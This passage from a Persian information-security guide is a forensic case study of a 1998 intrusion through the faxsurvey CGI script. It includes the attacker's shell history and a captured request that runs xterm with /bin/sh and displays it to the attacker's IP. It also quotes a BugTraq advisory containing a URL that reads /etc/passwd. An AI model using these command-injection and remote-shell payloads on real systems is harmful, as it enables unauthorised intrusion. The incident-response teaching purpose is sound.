‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ‪ CGI‬ﺭﺍ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺳﻄﺮﻫﺎﻱ ‪ ۸‬ﺗﺎ ‪ ،۱۷‬ﻣﻬﺎﺟﻢ ﺍﺯ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ‬
‫‪ faxsurvey‬ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﻗﺮﻳﺐ ﺑﻪ ﻳﻘﻴﻦ ﺑﺎ ﻳﻚ ﺍﺑﺰﺍﺭ ﻣﺘﻔﺎﻭﺕ ﺍﻧﺠﺎﻡ ﺷﺪﻩ‪ .‬ﻳﻚ ﺩﻟﻴـﻞ ﺁﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻧﺴﺨﺔ ﭘﺮﻭﺗﻜﻞ ‪ HTTP‬ﻛﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﺮﺩﻩ ﺍﺯ "‪ "HTTP/1.0‬ﺑﻪ "‪ " HTTP/1.1‬ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﻓﺎﻳﻞ ﺛﺒﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺁﺷﻜﺎﺭ ﻛﺮﺩ ﻛﻪ ﺍﺳﻢ ﻛﺎﻣﻞ ﻣﻴﺰﺑﺎﻥ ﻣﻬﺎﺟﻢ ‪ krldb110-06.splitrock.net‬ﺑﻮﺩﻩ ﺍﺳـﺖ‪ .‬ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻓﺮﻣﺎﻥ ‪ ،host‬ﺍﻳﻦ ﺁﺩﺭﺱ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﻭﺍﻗﻌﻲ ﺗﺮﺟﻤﻪ ﺷﻮﺩ‪:‬‬
‫‪apache: {43} % host krldb110-06.splitrock.net‬‬
‫‪krldb110-06.splitrock.net has address 209.156.113.121‬‬
‫‪apache: {44} %‬‬
‫ﺑﺎ ﺑﺮﺭﺳﻲ ﺍﻳﻦ ﻓﺎﻳﻞ ﺛﺒﺖ‪ ،‬ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ‪ /cgi-bin/faxsurvey‬ﻧﻘﺼﻲ ﺩﺍﺭﺩ ﻛﻪ ﺑـﻪ ﻣﻬـﺎﺟﻢ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻓـﺮﺍﻣﻴﻦ‬
‫ﺩﻟﺨﻮﺍﻩ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﺪ )ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺑﻪ ﭼﻪ ﺩﻟﻴﻞ ﺩﻳﮕﺮ ﻣﻤﻜﻦ ﺑﻮﺩ ﻣﻬﺎﺟﻢ ﺑﺎ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺍﻳﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺍﺭﺳﺎﻝ ‪URL‬ﻫﺎ ﺑﺎ ﺁﺭﮔﻮﻣﺎﻥﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺑﭙﺮﺩﺍﺯﺩ؟(‪.‬‬
‫ﺍﮔﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺻﺤﺖ ﻣﻲﺩﺍﺷﺖ‪ ،‬ﺁﻧﮕﺎﻩ ﻓﺮﺍﻣﻴﻦ ﺯﻳﺮ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻣﺪﻩ ﺑﻮﺩﻧﺪ‪:‬‬
‫‪ls -lFa‬‬
‫‪ls -lFa‬‬
‫‪uname -a‬‬
‫‪id‬‬
‫‪cat /etc/passwd‬‬
‫‪ls -lFa /usr/‬‬
‫‪id‬‬
‫‪pwd‬‬
‫‪/bin/pwd‬‬
‫‪ls -lFa‬‬
‫‪ls -lFa../conf/‬‬
‫ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﻭﺷﻦ ﻧﻴﺴﺖ ﻛﻪ ﭼﮕﻮﻧﻪ ﻣﻬﺎﺟﻢ ﺗﻮﺍﻧﺴﺘﻪ ﺍﺯ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﻓﺮﺍﻣﻴﻦ ﺑﻪ ﺍﺟﺮﺍﻱ ﻓﺮﻣﺎﻥ ‪ xterm‬ﺑﺮﺳﺪ‪ ،‬ﺍﻣـﺎ ﺑـﻪ ﺧـﻮﺑﻲ ﺭﻭﺷـﻦ‬
‫ﺍﺳﺖ ﻛﻪ ﻓﺮﻣﺎﻥ ‪ xterm‬ﺍﺟﺮﺍ ﺷﺪﻩ‪ ،‬ﭼﻮﻥ ﺳﻄﺮ ‪ HTTP‬ﺩﺭ ﺧﺮﻭﺟﻲ ﻓﺮﻣﺎﻥ ‪ ،w‬ﭘﺮﺩﺍﺯﺓ ‪ xterm‬ﺩﺭﺣﺎﻝ ﺍﺟـﺮﺍ‪ ،‬ﻭ ﺳـﻄﺮ ‪ X11‬ﺩﺭ ﻓﺮﻣـﺎﻥ‬
‫‪ netstat‬ﺷﻮﺍﻫﺪﻱ ﺑﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻫﺴﺘﻨﺪ‪.‬‬
‫‪٤٧‬‬
‫ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ‪ ISP ،‬ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻣﻬﺎﺟﻢ ﺩﺭ ﺳﺎﻳﺮ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺟﺴﺘﺠﻮ ﻛﺮﺩ‪ .‬ﻳﻚ ﻧﺘﻴﺠﺔ ﻣﺸﻜﻮﻙ ﺩﺭ ﻓﺎﻳـﻞ ﺛﺒـﺖ ﭘﻴﺎﻣﻬـﺎ‬
‫ﭘﻴﺪﺍ ﺷﺪ ‪ -‬ﻇﺎﻫﺮﹰﺍ ﻣﻬﺎﺟﻢ ﺗﻼﺵ ﻛﺮﺩﻩ ﻛﻪ ﺍﺯ ﻳﻚ ﻧﻘﺺ ﺩﺭ ‪ POP‬ﻳﺎ ‪ qpopper‬ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪:‬‬
‫* ‪apache: {15} % grep -i krldb110-06‬‬
‫‪messages:Oct 6 03:38:29 apache popper.bsdos[22312]: @KRLDB110-06. splitrock.net: -ERR‬‬
‫‪POP‬‬
‫‪timeout‬‬
‫ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺳﺎﺑﻘﺔ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﻬﺎﺟﻢ‪ ،‬ﺁﻧﻬﺎ ﻣﺘﻮﻗﻒ ﺷﺪﻧﺪ‪ ،‬ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﺣﺎﻓﻈﺔ ﭘﺮﺩﺍﺯﺷﻲ ﺫﺧﻴﺮﻩ ﺷﺪ‪ ،‬ﻭ ﺁﻧﮕـﺎﻩ ﭘـﺮﺩﺍﺯﻩﻫـﺎ ﺍﺯ‬
‫ﺣﺎﻓﻈﻪ ﺑﻴﺮﻭﻥ ﺍﻧﺪﺍﺧﺘﻪ ﺷﺪﻧﺪ‪.‬‬

‫‪47‬‬ ‫‪Messages Log File‬‬


‫‪٢٧٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﻪ ﺩﻧﺒﺎﻝ ﺍﻳﻨﻜﺎﺭ ﻳﻚ ﺿﺎﺑﻄﻪ ﺑﻪ ﻣـﺴﻴﺮﻳﺎﺑﻬﺎﻱ ‪ ISP‬ﺍﺿـﺎﻓﻪ ﺷـﺪ ﺗـﺎ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺁﺩﺭﺳـﻬﺎﻱ ‪ IP‬ﻣﻬـﺎﺟﻢ ﺭﺍ ﻣـﺴﺪﻭﺩ ﻛﻨـﺪ‪ .‬ﻣﺠﻮﺯﻫـﺎﻱ‬
‫ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ‪ faxsurvey‬ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻨﺪ ﺗﺎ ﻫﻤﻪ ﭼﻴﺰ ﺑﺮﺍﻱ ﺷﺮﻭﻉ ﻳﻚ ﺗﺠﺴﺲ ﺁﻣﺎﺩﻩ ﺑﺎﺷﺪ‪ .‬ﭼﻨـﺪ ﺭﻭﺯ‬
‫ﺑﻌﺪ ﻫﻢ ﺗﻜﻪﺑﺮﻧﺎﻣﻪ ﺍﺯ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺣﺬﻑ ﺷﺪ‪.‬‬
‫‪ ISP‬ﻗﺮﺑﺎﻧﻲ ﺑﺎ ﺷﺮﻛﺖ ﺧﺪﻣﺎﺗﻲ ‪ SplitRock‬ﺗﻤﺎﺱ ﮔﺮﻓﺖ؛ ﻫﻤﺎﻥ ‪ ISP‬ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺁﺩﺭﺱ ‪ IP‬ﻣﻬﺎﺟﻢ ﺭﺍ ﻋﻬـﺪﻩﺩﺍﺭ ﺑـﻮﺩ‪ .‬ﻣـﺸﺨﺺ‬
‫ﺷﺪ ﻛﻪ ‪ SplitRock‬ﭼﻨﺪ ‪ modem pool‬ﻛﻪ ﺑﺮﺍﻱ ‪ ISP‬ﺩﻳﮕﺮ ﺗﻬﻴﻪ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ﻳﻚ ﻣﻮﺍﻓﻘﺘﻨﺎﻣﺔ ﺍﺟﺎﺭﻩ ﺗﻬﻴﻪ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪.‬‬
‫ﺍﺯ ‪ SplitRock‬ﺧﻮﺍﺳﺘﻪ ﺷﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺩﺭ ﺗﺤﻘﻴﻘﺎﺕ ﺁﺗﻲ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ ‪ strings‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﻬﺎﺟﻢ ﺑﺪﺳـﺖ ﺁﻳـﺪ‪ .‬ﻳـﻚ ﮔـﺮﻭﻩ ﺍﺯ ﺭﺷـﺘﻪﻫـﺎ‬
‫‪٤٨‬‬
‫ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﺑﻘﺔ ﭘﻮﺳﺘﻪ ﻣﻲﺷﺪﻧﺪ‪ ،‬ﻛﻪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻓﺮﺍﻣﻴﻦ ﺗﺎﻳﭗﺷﺪﻩ ﺗﻮﺳﻂ ﺷﺨﺺ ﻣﻬﺎﺟﻢ ﺑﻮﺩﻧﺪ‪ .‬ﺑﻨﻈﺮ ﻣﻲﺭﺳﻴﺪ ﻣﻬﺎﺟﻢ ﻳﻚ ‪rootkit‬‬
‫ﺭﺍ ‪ download‬ﻛﺮﺩﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﻼﺵ ﺩﺍﺷﺘﻪ ﻛﻪ ﻳﻚ ﺣﻤﻠﺔ ﺳﺮﺭﻳﺰﻱ ‪ ٤٩Buffer‬ﻋﻠﻴﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ IMAP‬ﺳﻴﺴﺘﻢ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪:‬‬

‫‪-lFa‬‬ ‫‪gcc -o s s.c‬‬


‫‪st2.c‬‬ ‫‪ftp 209.156.113.121‬‬
‫‪cron.c‬‬ ‫‪gcc -o s st2.c‬‬
‫‪cxterm.c ./s console‬‬
‫‪x2.c‬‬ ‫‪t.s‬‬
‫‪qpush.c .121‬‬
‫‪cat t.c‬‬ ‫‪qpush.c‬‬
‫‪cat.c‬‬ ‫‪ppp.c‬‬
‫‪cat s.c‬‬ ‫‪t2.c‬‬
‫‪gc c‬‬ ‫‪cron.c‬‬
‫‪ls -lFa‬‬ ‫‪cxterm.c‬‬
‫‪./s -v c2 tcsh‬‬
‫‪./s p0‬‬ ‫‪x2.c‬‬
‫‪ls -lFa / README‬‬
‫‪cat.s‬‬ ‫‪README.debian‬‬
‫‪ls -lFa‬‬ ‫‪qpush‬‬
‫‪cat /w‬‬ ‫‪qpush.c‬‬
‫‪ls -lFa / qpush.c.old‬‬
‫‪cat.s‬‬ ‫‪Gf: not found‬‬
‫‪_=.s‬‬ ‫‪/tmp‬‬
‫‪$ : not found‬‬ ‫‪mfs:28‬‬
‫‪gcc -o s steal.c /bin/sh‬‬
‫‪ls -lFa *.c‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪/bin/sh‬‬
‫‪/bin/sh‬‬
‫‪/etc/inetd.conf‬‬
‫‪qpush.c‬‬
‫‪/usr/bin/gcc‬‬
‫‪n/gcc‬‬
‫‪./cc‬‬
‫‪Expr‬‬
‫‪Done‬‬
‫‪/bin/sh‬‬
‫‪inetd.conf‬‬
‫‪t) | telnet 127.1 143‬‬
‫‪cd /etc‬‬
‫‪cat.s‬‬

‫‪48‬‬ ‫‪Shell History‬‬


‫‪49‬‬ ‫‪Buffer Overflow Attack‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ٢٧٦

which pwd
ls –lFa
expr $L + 1
ls –lFa
./cc –10
./cc
‫ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻣﺘﻐﻴﻴﺮﻫﺎﺋﻲ ﺑﻮﺩﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺍﺯ‬.‫ﻧﻮﻉ ﺩﻭﻡ ﺭﺷﺘﻪﻫﺎ ﻛﻪ ﺩﺭ ﺗﺼﺎﻭﻳﺮ ﺣﺎﻓﻈﻪ ﭘﻴﺪﺍ ﺷﺪﻧﺪ ﻣﺘﻨﺎﻇﺮ ﻣﺘﻐﻴﻴﺮﻫﺎﻱ ﭘﻮﺳﺘﻪ ﺑﻮﺩﻧﺪ‬
CGI ‫ ﻛﻪ ﻣﺆﻳﺪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺍﺟﺮﺍﻱ ﭘﻮﺳﺘﻪ ﻧﺘﻴﺠﺔ ﻳﻚ ﺗﻬـﺎﺟﻢ‬- ‫ ﺑﺮﺍﻱ ﻳﻚ ﭘﺮﺩﺍﺯﻩ ﺗﻨﻈﻴﻢ ﺷﻮﻧﺪ‬CGI ‫ﻃﺮﻳﻖ ﺗﺨﻢﺭﻳﺰﻱ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ‬
‫ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﺔ ﻣﺮﺑـﻮﻁ ﺑـﻪ‬،‫ ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﻧﻔـﻮﺫ ﻣﺘﻮﺟـﻪ ﺁﻥ ﺑـﻮﺩ‬CGI ‫ ﺍﻳﻦ ﻗﺴﻤﺖ )ﺑﺨﺶ ﺯﻳﺮ( ﺗﺄﻳﻴﺪ ﻣﻲﻛﺮﺩ ﺁﻥ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ‬.‫ﺑﻮﺩﻩ ﺍﺳﺖ‬
:‫ ﺑﻮﺩ‬faxsurvey

GATEWAY_INTERFACE=CGI/1.1
REMOTE_HOST=krldb110-06.splitrock.net
MACHTYPE=i386-pc-bsdi3.1
HOSTNAME=apache.vineyard.net
L=100
SHLVL=1
REMOTE_ADDR=209.156.113.121
QUERY_STRING=/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20- rv%20-
e%20/bin/sh
DOCUMENT_ROOT=/htdocs/biz/captiva
REMOTE_PORT=4801
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)
HTTP_ACCEPT=application/vnd.ms-excel, application/msword, application/vnd. ms-powerpoint,
*/*
SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
HTTP_HOST=www.captivacruises.com
LOGNAME=http
WINDOWID=8388621
_=/bins
REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.
113.121:0.0%20-rv%20-e%20/bin/sh
SERVER_SOFTWARE=Stronghold/2.2 Apache/1.2.5 C2NetUS/2002
TERM=xterm
HTTP_CONNECTION=Keep-Alive
PATH=/usr/local/bin:/bin:/usr/bin:/usr/sbin
HTTP_ACCEPT_LANGUAGE=en-us
DISPLAY=209.156.113.121:0.0
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
SHELL=/bin/tcsh
REQUEST_METHOD=GET
OSTYPE=bsdi3.1
SERVER_ADMIN=mvol@vineyard.net
SERVER_ROOT=/usr/local/apache
TERMCAP=xterm|vi|xterm-ic|xterm-vi|xterm with insert character instead of insert mode:
:al@:dl@:im=:ei=:mi@:ic=\E[@: :AL=\E[%dL:DC=\E[%dP:DL=\E[
%dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA: :al=\E[L:am: :bs:cd=\E[J:ce=\
E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80: :cs=\E[%i%d;%dr:ct=\E[3k: :dc
SERVER_PORT=80
SCRIPT_NAME=/cgi-bin/faxsurvey
HOSTTYPE=i386
‫‪٢٧٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﭘﺲ ﺍﺯ ﻧﻔﻮﺫ‪ ISP ،‬ﻗﺮﺑﺎﻧﻲ ﺑﺎ ﺩﻓﺘﺮ ﺗﺠﺴﺲ ﺩﻳﻮﺍﻥ ﻓﺪﺭﺍﻝ ﺩﺭ ﺑﻮﺳﺘﻮﻥ ﺗﻤﺎﺱ ﮔﺮﻓﺖ‪ ISP .‬ﻣﻄﻠﻊ ﺷﺪ ﻛـﻪ ﺩﻓﺘـﺮ ﺑﻮﺳـﺘﻮﻥ ﭘـﻴﺶ ﺍﺯ ﺁﻧﻜـﻪ‬
‫ﺗﺤﻘﻴﻘﺎﺗﻲ ﺭﺍ ﺷﺮﻭﻉ ﻛﻨﺪ ﻻﺯﻡ ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ﺳﻘﻒ ﻫﺸﺖ ﻫﺰﺍﺭ ﺩﻻﺭ ﺧﺴﺎﺭﺕ ﺩﻳﺪﻩ ﺑﺎﺷﺪ‪ .‬ﭼﻮﻥ ﻣﻴﺰﺍﻥ ﺧـﺴﺎﺭﺕ ﺑـﻪ ﺍﻳـﻦ ﺳـﻘﻒ ﺣـﺪﺍﻗﻠﻲ‬
‫ﻧﺮﺳﻴﺪﻩ ﺑﻮﺩ‪ ،‬ﻫﻴﭻ ﺗﺠﺴﺴﻲ ﺷﺮﻭﻉ ﻧﺸﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﺣﺪﺍﻗﻞﻫﺎﻳﻲ ﻗﺎﺑﻞ ﺩﺭﻙ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺑﻪ ﺩﻭ ﺩﻟﻴﻞ ﻋﻤﺪﻩ ﺑﻬﺘﺮ ﺍﺳﺖ‬
‫ﺍﻳﻨﮕﻮﻧﻪ ﻧﺒﺎﺷﺪ‪:‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻠﻪﻫﺎ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺴﺒﺘﹰﺎ ﺟﻮﺍﻥ ﻫﺪﺍﻳﺖ ﻣﻲﺷﻮﺩ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﺍﺧﻄﺎﺭﻳﻪ ﻳﺎ ﺣﺪﺍﻛﺜﺮ ﻳـﻚ ﺣﻜـﻢ‬ ‫•‬
‫ﺗﻌﻠﻴﻖ‪ ،‬ﭼﻨﻴﻦ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺭﺍ ﻣﺘﻮﻗﻒ ﻛﻨﻨﺪ‪ .‬ﻓﻘﺪﺍﻥ ﺗﺠﺴﺲ ﺭﺳﻤﻲ ﻭ ﭘﻴﮕﻴﺮﻱ ﺻـﺮﻓﹰﺎ ﺍﻳـﻦ ﻣﻬﺎﺟﻤـﺎﻥ ﺭﺍ ﺗـﺸﻮﻳﻖ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑـﻪ‬
‫ﺟﺮﻣﻬﺎﻱ ﺑﺰﺭﮔﺘﺮ ﻭ ﺑﺰﺭﮔﺘﺮ ﺑﭙﺮﺩﺍﺯﻧﺪ ﺗﺎ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺟﺪﻱ ﺑﺪﻭﺷﺸﺎﻥ ﺑﻴﻔﺘﺪ‪.‬‬
‫ﻻ ﺑـﺎ ﻋـﺪﻡ ﺗﻮﺟـﻪ ﺳـﺎﻳﺮﻳﻦ ﻣﻮﺍﺟـﻪ‬ ‫ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺴﻴﺎﺭ ﺧﺒﺮﻩ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺩﻳﮕﺮ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬ ‫•‬
‫ﻣﻲﺷﻮﺩ ﺩﺳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﺯﺭﺳﻴﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺍﺯ ﺟﺮﺍﺋﻢ ﻛﻮﭼﻚ‪ ،‬ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺭﺍ ﺑﻪ ﺳـﻤﺖ‬
‫ﺟﺮﺍﺋﻢ ﺑﺰﺭﮒ ﺍﻗﺘﺼﺎﺩﻱ ﻫﺪﺍﻳﺖ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻳﻚ ﺍﺧﺘﻼﻑ ﺣﺴﺎﺑﺮﺳﻲ ‪ ۷۵‬ﺳﻨﺘﻲ ﺑﺎﻋﺚ ﺷـﺪ ﻛـﻪ ﻛﻠﻴـﻒ ﺍﺳـﺘﻮﻝ‪ ٥٠‬ﻳـﻚ‬
‫ﻧﻔﻮﺫﮔﺮ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺭﺩﻳﺎﺑﻲ ﻛﻨﺪ ﻛﻪ ﺳﺮﺍﻧﺠﺎﻡ ﻣﺸﺨﺺ ﺷﺪ ﺑﻪ ﺩﺳﺘﻮﺭ ﺍﺗﺤﺎﺩ ﺟﻤﺎﻫﻴﺮ ﺷﻮﺭﻭﻱ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻧﻈﺎﻣﻲ ﺍﻳﺎﻻﺕ‬
‫ﻣﺘﺤﺪﻩ ﻧﻔﻮﺫ ﻛﺮﺩﻩ ﺍﺳﺖ‪) .‬ﺩﺍﺳﺘﺎﻧﻲ ﻛﻪ ﺟﺰﺋﻴﺎﺕ ﺁﻥ ﺩﺭ ﻧﻤﺎﻳﺸﻨﺎﻣﻪ ﭘﻠﻴﺴﻲ "ﻧﻔﻮﺫﮔﺮ ﻛﻼﺳﻴﻚ"‪ ٥١‬ﺍﺳﺘﻮﻝ؛ "ﺗﺨﻢ ﻣﺮﻍ ﻛﺎﻛﻮ"‪ ٥٢‬ﺁﻣﺪﻩ ﺍﺳﺖ‪(.‬‬
‫ﻭﻗﺘﻲ ﻣﺴﺌﻠﻪ ﺭﻭﺷﻦ ﺷﺪ‪ ،‬ﻣﻌﻠﻮﻡ ﺷﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ ‪ faxsurvey‬ﺣﺪﻭﺩ ﺳﻪ ﻣﺎﻩ ﻗﺒـﻞ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﻪ ﺩﺭ ﮔـﺮﻭﻩ‬
‫ﭘﺴﺘﻲ ‪ BugTraq‬ﮔﺰﺍﺭﺵ ﺷﺪﻩ ﺑﻮﺩ‪ .‬ﻳﺎ ﻛﺴﻲ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ‪ ISP‬ﭘﻴﺎﻣﻬﺎﻱ ﮔﺮﻭﻩ ﭘﺴﺘﻲ ‪ BugTraq‬ﺭﺍ ﻧﺨﻮﺍﻧﺪﻩ ﺑﻮﺩ‪ ،‬ﻳﺎ ﺍﻳﻨﻜﻪ ﻛـﺴﻲ ﺧﺒـﺮ‬
‫ﻧﺪﺍﺷﺖ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ ‪ faxsurvey‬ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬

‫‪Date:‬‬ ‫‪Tue, 4 Aug 1998 07:41:24 -0700‬‬


‫‪Reply-To:‬‬ ‫‪dod@muenster.net‬‬
‫‪From:‬‬ ‫>‪Tom <dod@MUENSTER.NET‬‬
‫‪Subject:‬‬ ‫‪remote exploit in faxsurvey cgi-script‬‬

‫!‪Hi‬‬

‫‪There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any‬‬
‫‪command s/he wants with the permissions of the HTTP-Server.‬‬

‫‪All the attacker has to do is type http://joepc.linux.elsewhere.org/cgi-‬‬


‫‪bin/faxsurvey?/bin/cat%20/etc/passwd in his favorite Web-Browser to get a copy of your‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪Password-File.‬‬

‫‪All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package‬‬
‫‪installed are vulnerable to this attack.‬‬

‫‪AFAIK the problem exists in the call of 'eval'.‬‬

‫>‪I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild <bs@suse.de‬‬
‫‪told me, that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just‬‬
‫‪remove the script from the file list.‬‬
